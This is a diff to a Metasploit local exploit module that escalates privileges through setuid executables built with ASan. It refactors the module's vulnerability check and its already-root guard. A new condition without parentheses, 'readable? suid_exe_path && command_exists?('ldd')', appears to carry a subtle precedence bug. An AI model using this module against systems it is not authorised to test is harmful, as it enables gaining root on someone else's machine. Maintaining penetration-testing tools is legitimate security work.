@@ -131,10 +131,9 @@ class MetasploitModule < Msf::Exploit::Local
   end
 
   def check
-    unless setuid? suid_exe_path
-      vprint_error "#{suid_exe_path} is not setuid"
-      return CheckCode::Safe
-    end
+    return CheckCode::Safe("#{suid_exe_path} file not found") unless file? suid_exe_path
+    return CheckCode::Safe("#{suid_exe_path} is not setuid") unless setuid? suid_exe_path
+
     vprint_good "#{suid_exe_path} is setuid"
 
     # Check if the executable was compiled with ASan
@@ -145,7 +144,8 @@ class MetasploitModule < Msf::Exploit::Local
     # Otherwise, we can try to detect ASan via the help output with the `help=1` option.
     # This approach works regardless of whether the setuid executable is readable,
     # with the obvious disadvantage that it requires invoking the executable.
-    if cmd_exec("test -r #{suid_exe_path} && echo true").to_s.include?('true') && command_exists?('ldd')
+
+    if readable? suid_exe_path && command_exists?('ldd')
       unless cmd_exec("ldd #{suid_exe_path}").to_s.include? 'libasan.so'
         vprint_error "#{suid_exe_path} was not compiled with ASan"
         return CheckCode::Safe
@@ -168,10 +168,8 @@ class MetasploitModule < Msf::Exploit::Local
   end
 
   def exploit
-    if is_root?
-      unless datastore['ForceExploit']
-        fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'
-      end
+    if !datastore['ForceExploit'] && is_root?
+      fail_with(Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.')
     end
 
     unless writable? base_dir
